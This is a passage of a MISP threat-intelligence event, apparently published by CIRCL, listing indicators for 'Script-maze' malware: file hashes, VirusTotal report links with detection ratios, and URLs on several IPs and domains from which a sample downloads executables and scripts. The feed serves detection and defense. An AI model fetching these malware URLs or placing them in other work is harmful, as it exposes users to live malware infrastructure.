1590 lines
No EOL
56 KiB
JSON
1590 lines
No EOL
56 KiB
JSON
{
|
|
"Event": {
|
|
"analysis": "1",
|
|
"date": "2019-05-26",
|
|
"extends_uuid": "",
|
|
"info": "Script-maze historical malware seen",
|
|
"publish_timestamp": "1558859877",
|
|
"published": true,
|
|
"threat_level_id": "3",
|
|
"timestamp": "1558859858",
|
|
"uuid": "5cea4d65-d448-4e7c-af4a-4fe3950d210f",
|
|
"Orgc": {
|
|
"name": "CIRCL",
|
|
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
|
|
},
|
|
"Tag": [
|
|
{
|
|
"colour": "#004646",
|
|
"local": false,
|
|
"name": "type:OSINT",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0071c3",
|
|
"local": false,
|
|
"name": "osint:lifetime=\"perpetual\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0087e8",
|
|
"local": false,
|
|
"name": "osint:certainty=\"50\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#ffffff",
|
|
"local": false,
|
|
"name": "tlp:white",
|
|
"relationship_type": ""
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-f9e0-4c71-ab29-2a8d950d210f",
|
|
"value": "ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-1624-4a75-bfb1-2a8d950d210f",
|
|
"value": "6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-28f8-454f-9c29-2a8d950d210f",
|
|
"value": "fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-4dc4-4313-94f7-2a8d950d210f",
|
|
"value": "968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-2750-40d2-be58-2a8d950d210f",
|
|
"value": "58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-3444-4e63-b177-2a8d950d210f",
|
|
"value": "2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-8490-4f28-8174-2a8d950d210f",
|
|
"value": "65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-5fd0-44b4-9fe2-2a8d950d210f",
|
|
"value": "84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-5410-4c49-ab62-2a8d950d210f",
|
|
"value": "b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859335",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4e47-d544-4169-8690-47b5950d210f",
|
|
"value": "http://74.222.1.38:8888/close.bat"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859694",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "5cea4fae-4d38-4905-acc7-438e950d210f",
|
|
"value": "4d437b5614edcc7d1ee5e4bcf5785ef9"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-bbc8-4e1d-85d3-4391950d210f",
|
|
"value": "http://wmi.1217bye.host/2.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-13b8-4e59-b16c-4d59950d210f",
|
|
"value": "http://173.247.239.186/ok.exe"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-4038-44f6-997e-45ec950d210f",
|
|
"value": "http://173.247.239.186/upsupx.exe"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-9f64-4154-9ea8-4b50950d210f",
|
|
"value": "http://173.247.239.186/u.exe"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-5828-4649-91d3-492e950d210f",
|
|
"value": "http://45.58.135.106/xpdown.dat"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-a7fc-49a8-80cb-4948950d210f",
|
|
"value": "http://45.58.135.106/ok/down.html"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-af8c-402c-be36-426a950d210f",
|
|
"value": "http://45.58.135.106/ok/64.html"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-2738-414a-9d19-43cf950d210f",
|
|
"value": "http://223.25.247.240/ok/ups.html"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-9a74-4407-927f-4df9950d210f",
|
|
"value": "http://45.58.135.106/ok/vers.html"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-cff8-4e3b-a350-42a9950d210f",
|
|
"value": "http://45.58.135.106/kill.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-4bcc-45be-a51a-404a950d210f",
|
|
"value": "http://wmi.1217bye.host/S.ps1"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-24d8-45be-8a89-4940950d210f",
|
|
"value": "http://173.208.139.170/s.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-83a0-4e47-a433-4b92950d210f",
|
|
"value": "http://35.182.171.137/l.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-f990-4ded-887d-497e950d210f",
|
|
"value": "http://74.222.1.38/up.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859765",
|
|
"to_ids": false,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-3614-4936-adaa-470f950d210f",
|
|
"value": "http://2019.ip138.com/ic.asp"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-9268-41e9-ab92-49f9950d210f",
|
|
"value": "http://45.58.135.106/downs.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-4488-40f1-8920-4e1a950d210f",
|
|
"value": "http://185.112.156.92/downs.exe"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-a3d8-4c30-86d5-4959950d210f",
|
|
"value": "http://66.117.6.174/ups.rar"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-d2f8-46ec-9c24-4b42950d210f",
|
|
"value": "http://198.148.90.34/b.exe"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859814",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea5026-2614-4801-98d5-41c8950d210f",
|
|
"value": "http://down.0814ok.info:8888/"
|
|
}
|
|
],
|
|
"Object": [
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859150",
|
|
"uuid": "380c7782-2dd4-443a-9108-bf700a7d0b43",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "380c7782-2dd4-443a-9108-bf700a7d0b43",
|
|
"referenced_uuid": "7e77557c-59e5-421e-9ac1-7d8d4d7dc322",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859152",
|
|
"uuid": "5cea4d90-1600-4db1-ba50-43af950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "940587bc-ccde-402c-8de9-9e4271d239f3",
|
|
"value": "b0b34b3a52b31e001b0582a70cad2aa2"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "f7c266b7-ef28-4f1d-adf9-f9712678f648",
|
|
"value": "de1318abdb0f202181c360d933ea543b2b8c85dd"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "1e93ba14-952d-43ca-a633-2772e2e07d3b",
|
|
"value": "ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859150",
|
|
"uuid": "7e77557c-59e5-421e-9ac1-7d8d4d7dc322",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "6bb41516-4b77-4319-9bd1-2ecc84212902",
|
|
"value": "2019-05-23T00:40:50"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "e1a0aedc-fef3-47ac-96bf-1346a0917178",
|
|
"value": "https://www.virustotal.com/file/ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9/analysis/1558572050/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "81466fe0-9b85-43b0-8734-8abf874f6430",
|
|
"value": "1/57"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859150",
|
|
"uuid": "94dcbf47-d0d9-4e9e-b48f-c7b6fcc019b2",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "94dcbf47-d0d9-4e9e-b48f-c7b6fcc019b2",
|
|
"referenced_uuid": "550f6b80-a32c-41d9-93c4-db9c41528a0b",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859152",
|
|
"uuid": "5cea4d90-fe08-4a53-942d-411c950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "1c6f7c31-6784-44ba-a232-0d7832de0ae7",
|
|
"value": "b340e1cdf15eb702ed14e05b42163910"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "3d8dc364-12d6-4ce2-81bd-f92f3c9d809a",
|
|
"value": "9aafb2147de42cea11d6e798721554ba456f34e8"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "49f41045-340c-42c6-af63-180f7b0006a4",
|
|
"value": "fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859150",
|
|
"uuid": "550f6b80-a32c-41d9-93c4-db9c41528a0b",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "ba54ef1f-42d0-4d51-b3a8-55af788d40f7",
|
|
"value": "2019-02-24T00:01:11"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "f569b93d-067a-4d0d-85dd-4d9c568fb189",
|
|
"value": "https://www.virustotal.com/file/fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9/analysis/1550966471/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "ff3e5153-e691-4326-b9b7-1ce6b44633e0",
|
|
"value": "1/51"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859150",
|
|
"uuid": "b58ad199-5bc6-4892-b6ea-1758b79ea763",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "b58ad199-5bc6-4892-b6ea-1758b79ea763",
|
|
"referenced_uuid": "57dc22c7-3d93-437a-9930-7312a8472014",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859152",
|
|
"uuid": "5cea4d90-cb98-4a37-937c-4804950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "0efb06f7-be0f-461a-88e2-582f603f2737",
|
|
"value": "942a3b5532bd6e4bdfea13cf077dded5"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "74dd6bfe-c595-4d82-8082-663908974de2",
|
|
"value": "5eea109a6d3f5f521a82bdff2532dec5f376e071"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "11442f89-278e-48fc-bf4e-9afb04fb3feb",
|
|
"value": "84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859151",
|
|
"uuid": "57dc22c7-3d93-437a-9930-7312a8472014",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "1dc2c7b3-c04b-4a28-b258-580b4e22057b",
|
|
"value": "2018-07-03T21:19:21"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "3fcfec4a-4286-4ab7-b3a1-e502fabfaf8d",
|
|
"value": "https://www.virustotal.com/file/84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088/analysis/1530652761/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "3118f2c7-2fed-4e23-b896-d0dbb81ac716",
|
|
"value": "18/57"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859151",
|
|
"uuid": "b2749b84-7bae-418b-b58a-278ee29eefea",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "b2749b84-7bae-418b-b58a-278ee29eefea",
|
|
"referenced_uuid": "bf3c1c50-d629-446c-a802-a541481256f3",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859152",
|
|
"uuid": "5cea4d90-dae4-416c-83c0-4162950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "22eb9fd9-af68-43ae-a557-0233544a6c29",
|
|
"value": "f2e4361d57eef76cbc5727245fe402f8"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "edddbb5b-5c03-4fed-a138-2999dafd8867",
|
|
"value": "c58b5aa5728e8bf381470ad89d234463cd992937"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "b92cf7e4-c5eb-4ef0-8518-0fb1e0d63ecd",
|
|
"value": "2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859151",
|
|
"uuid": "bf3c1c50-d629-446c-a802-a541481256f3",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "f7719a96-7a86-419d-b29f-e622a275a9bb",
|
|
"value": "2019-03-15T00:02:54"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "94c66b94-2553-4cd0-adac-de1f210c5ac5",
|
|
"value": "https://www.virustotal.com/file/2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830/analysis/1552608174/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "f14e3ba7-10ba-43fb-b70b-bca1f43972d8",
|
|
"value": "16/55"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859151",
|
|
"uuid": "7eab9890-1152-4540-b14c-b1713dd74db7",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "7eab9890-1152-4540-b14c-b1713dd74db7",
|
|
"referenced_uuid": "4a5526a0-66ef-4a36-859c-9fae1cf3a73e",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859153",
|
|
"uuid": "5cea4d91-d694-445d-85b2-4cfb950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "ac059130-8c83-4f2a-a720-f3aabe1ab1c2",
|
|
"value": "4be50da2219f8dc41f46e7844e265e87"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "c6b9ef10-9f62-4de8-978d-ba8d2799fcc9",
|
|
"value": "c2ab04184e75649fdf85165fffd02f1f8c4c8bba"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "12d14b02-5b03-4f09-ab9c-936609698bee",
|
|
"value": "b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3"
|
|
}
|
|
]
